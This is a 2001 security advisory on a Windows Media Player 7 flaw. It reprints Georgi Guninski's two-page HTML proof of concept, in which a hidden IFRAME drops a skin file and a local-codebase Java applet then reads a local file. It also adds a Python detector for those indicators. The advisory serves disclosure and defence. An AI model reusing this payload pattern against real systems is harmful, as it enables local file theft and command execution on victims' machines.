Reported January 15, 2001, by Win2KSecAdvice

VERSIONS AFFECTED
  • Windows Media Player 7

DESCRIPTION

A high-risk vulnerability has been discovered in Windows Media Player 7. It lets an intruder read local files, browse a directory, and execute arbitrary commands. The cause is that Windows Media Player installs skins in a known directory under a known file name, and a Java applet can reach that location; that predictable, applet-accessible path is what makes the attack possible.

DEMONSTRATION

The following code was provided by Georgi Guninski:

--------wmp7-3.html--------------------------------------------------

<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f()
{
window.open("wmp7-3a.html");
}
setTimeout("f()",4000);
</SCRIPT>

---------------------------------------------------------------------

------wmp7-3a.html---------------------------------------------------

<APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>

<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>

---------------------------------------------------------------------
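As an added example, not part of the original advisory or of Georgi Guninski's demonstration, the following Python script scans HTML for the indicators visible in the two pages above: an APPLET whose CODEBASE is a file: URL or whose ARCHIVE points into the Windows Media Player SKINS directory, a PARAM named URL carrying a file: value, and an IFRAME that loads a .wmz skin file. The sample documents are constructed inline and mirror the snippets above; the function and class names are this example's own.

```python
"""Flag HTML that shows the WMP7 skin-directory applet pattern.

Heuristic content-filter logic for a proxy or mail gateway: it does not
parse Java or skins, it only reports markup that combines a local-file
applet codebase with the known skins path. Sample documents below are
constructed for this example and mirror the advisory's demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Path fragment taken from the advisory's demonstration page.
SKINS_DIR_MARKER = "windows media player/skins"


class AppletAuditor(HTMLParser):
    """Walk a document and collect (indicator, value) findings."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names; values may be None.
        a = {k: (v or "") for k, v in attrs}
        tag = tag.lower()
        if tag == "applet":
            codebase = a.get("codebase", "")
            archive = a.get("archive", "")
            # A file: codebase lets the applet load classes from the local disk.
            if urlparse(codebase).scheme.lower() == "file":
                self.findings.append(("applet_local_codebase", codebase))
            # The archive pointing into the skins directory is the dropped skin.
            if SKINS_DIR_MARKER in archive.replace("\\", "/").lower():
                self.findings.append(("applet_archive_in_skins_dir", archive))
        elif tag == "iframe":
            src = a.get("src", "")
            # A hidden IFRAME fetching a .wmz file is the skin-drop stage.
            if src.lower().split("?", 1)[0].endswith(".wmz"):
                self.findings.append(("iframe_loads_wmz_skin", src))
        elif tag == "param" and a.get("name", "").lower() == "url":
            # A URL parameter naming a local file is the read target.
            if urlparse(a.get("value", "")).scheme.lower() == "file":
                self.findings.append(("param_url_local_file", a.get("value", "")))


def audit_html(document):
    """Return the list of (indicator, value) findings for one HTML document."""
    auditor = AppletAuditor()
    auditor.feed(document)
    auditor.close()
    return auditor.findings


# Constructed samples mirroring the advisory's wmp7-3.html and wmp7-3a.html.
STAGE_ONE = """<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f() { window.open("wmp7-3a.html"); }
setTimeout("f()",4000);
</SCRIPT>"""

STAGE_TWO = """<APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>"""

# Constructed benign page: an ordinary applet served over HTTP.
BENIGN = '<APPLET CODEBASE="http://example.test/applets/" CODE="Clock.class" WIDTH=100 HEIGHT=100></APPLET>'

if __name__ == "__main__":
    for name, doc in (("stage one", STAGE_ONE), ("stage two", STAGE_TWO), ("benign", BENIGN)):
        print(name, "->", audit_html(doc) or "no findings")
```

Run as a script it prints the indicators found in each sample; in a gateway you would call audit_html on each HTML body and treat any applet_local_codebase or applet_archive_in_skins_dir finding as grounds to block or quarantine the page.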

VENDOR RESPONSE

Unfortunately, Georgi Guninski chose to inform Microsoft of this vulnerability on January 11, 2001, giving Microsoft only 1 business day to address the issue. I contacted Microsoft regarding this issue, and the company has assured me that it is working on a fix.

CREDIT

Discovered by Georgi Guninski.